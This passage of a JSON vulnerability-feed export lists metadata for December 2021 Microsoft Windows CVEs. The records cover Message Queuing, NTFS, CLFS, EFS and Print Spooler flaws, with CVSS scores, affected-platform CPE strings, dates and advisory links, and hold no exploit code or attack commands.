"cpe:2.3:o:microsoft:windows_10:21h2:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:21h2:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:arm64:*"]}, {"lastseen": "2023-05-23T15:48:51", "description": "Windows Installer Elevation of Privilege Vulnerability", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-12-15T15:15:00", "type": "cve", "title": "CVE-2021-43883", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-43883"], "modified": "2022-07-12T17:42:00", "cpe": ["cpe:/o:microsoft:windows_10:21h1", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_10:21h2", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_server:2022", "cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_server:20h2", "cpe:/o:microsoft:windows_11:-", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_10:1909"], "id": "CVE-2021-43883", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-43883", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:21h2:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp2:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_server:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp2:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server:2022:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h2:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:21h2:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:arm64:*"]}], "mscve": [{"lastseen": "2023-07-28T21:28:51", "description": "Microsoft Message Queuing Information Disclosure Vulnerability This CVE ID is unique from CVE-2021-43236.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-12-14T08:00:00", "type": "mscve", "title": "Microsoft Message Queuing Information Disclosure Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-43222", "CVE-2021-43236"], "modified": "2021-12-14T08:00:00", "id": "MS:CVE-2021-43222", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-43222", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-07-28T21:24:41", "description": "Microsoft Message Queuing Information Disclosure Vulnerability This CVE ID is unique from CVE-2021-43222.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-12-14T08:00:00", "type": "mscve", "title": "Microsoft Message Queuing Information Disclosure Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-43222", "CVE-2021-43236"], "modified": "2021-12-16T08:00:00", "id": "MS:CVE-2021-43236", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-43236", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-07-28T21:11:58", "description": "Windows Common Log File System Driver Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-43226.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-12-14T08:00:00", "type": "mscve", "title": "Windows Common Log File System Driver Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-43207", "CVE-2021-43226"], "modified": "2021-12-14T08:00:00", "id": "MS:CVE-2021-43207", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-43207", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-07-28T21:27:10", "description": "Windows Common Log File System Driver Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-43207.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-12-14T08:00:00", "type": "mscve", "title": "Windows Common Log File System Driver Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-43207", "CVE-2021-43226"], "modified": "2021-12-14T08:00:00", "id": "MS:CVE-2021-43226", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-43226", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-07-28T21:26:07", "description": "Windows NTFS Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-43229, CVE-2021-43231.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-12-14T08:00:00", "type": "mscve", "title": "Windows NTFS Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-43229", "CVE-2021-43230", "CVE-2021-43231"], "modified": "2021-12-14T08:00:00", "id": "MS:CVE-2021-43230", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-43230", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-07-28T21:25:47", "description": "Windows NTFS Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-43229, CVE-2021-43230.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-12-14T08:00:00", "type": "mscve", "title": "Windows NTFS Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-43229", "CVE-2021-43230", "CVE-2021-43231"], "modified": "2021-12-14T08:00:00", "id": "MS:CVE-2021-43231", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-43231", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-07-28T21:26:19", "description": "Windows NTFS Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-43230, CVE-2021-43231.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-12-14T08:00:00", "type": "mscve", "title": "Windows NTFS Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-43229", "CVE-2021-43230", "CVE-2021-43231"], "modified": "2021-12-14T08:00:00", "id": "MS:CVE-2021-43229", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-43229", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-07-28T21:29:47", "description": "Microsoft Local Security Authority Server (lsasrv) Information Disclosure Vulnerability", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-12-14T08:00:00", "type": "mscve", "title": "Microsoft Local Security Authority (LSA) Server Information Disclosure Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 6.8, "vectorString": "AV:N/AC:L/Au:S/C:C/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-43216"], "modified": "2021-12-16T08:00:00", "id": "MS:CVE-2021-43216", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-43216", "cvss": {"score": 6.8, "vector": "AV:N/AC:L/Au:S/C:C/I:N/A:N"}}, {"lastseen": "2023-07-28T21:29:35", "description": "Windows Encrypting File System (EFS) Remote Code Execution Vulnerability", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-12-14T08:00:00", "type": "mscve", "title": "Windows Encrypting File System (EFS) Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-43217"], "modified": "2021-12-15T08:00:00", "id": "MS:CVE-2021-43217", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-43217", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-07-28T21:30:00", "description": "iSNS Server Memory Corruption Vulnerability Can Lead to Remote Code Execution", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-12-14T08:00:00", "type": "mscve", "title": "iSNS Server Memory Corruption Vulnerability Can Lead to Remote Code Execution", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-43215"], "modified": "2021-12-14T08:00:00", "id": "MS:CVE-2021-43215", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-43215", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-07-28T21:15:14", "description": "Windows Print Spooler Elevation of Privilege Vulnerability", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-12-14T08:00:00", "type": "mscve", "title": "Windows Print Spooler Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41333"], "modified": "2021-12-14T08:00:00", "id": "MS:CVE-2021-41333", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-41333", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-07-28T21:24:50", "description": "Windows Fax Service Remote Code Execution Vulnerability", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-12-14T08:00:00", "type": "mscve", "title": "Windows Fax Service Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-43234"], "modified": "2021-12-14T08:00:00", "id": "MS:CVE-2021-43234", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-43234", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-07-28T21:27:33", "description": "Windows Common Log File System Driver Information Disclosure Vulnerability", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.5, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-12-14T08:00:00", "type": "mscve", "title": "Windows Common Log File System Driver Information Disclosure Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-43224"], "modified": "2021-12-14T08:00:00", "id": "MS:CVE-2021-43224", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-43224", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-07-28T21:24:05", "description": "Windows Remote Access Elevation of Privilege Vulnerability", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-12-14T08:00:00", "type": "mscve", "title": "Windows Remote Access Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-43238"], "modified": "2021-12-14T08:00:00", "id": "MS:CVE-2021-43238", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-43238", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-07-28T21:09:31", "description": "Windows Encrypting File System (EFS) Elevation of Privilege Vulnerability", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-12-14T08:00:00", "type": "mscve", "title": "Windows Encrypting File System (EFS) Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.0, "vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-43893"], "modified": "2021-12-16T08:00:00", 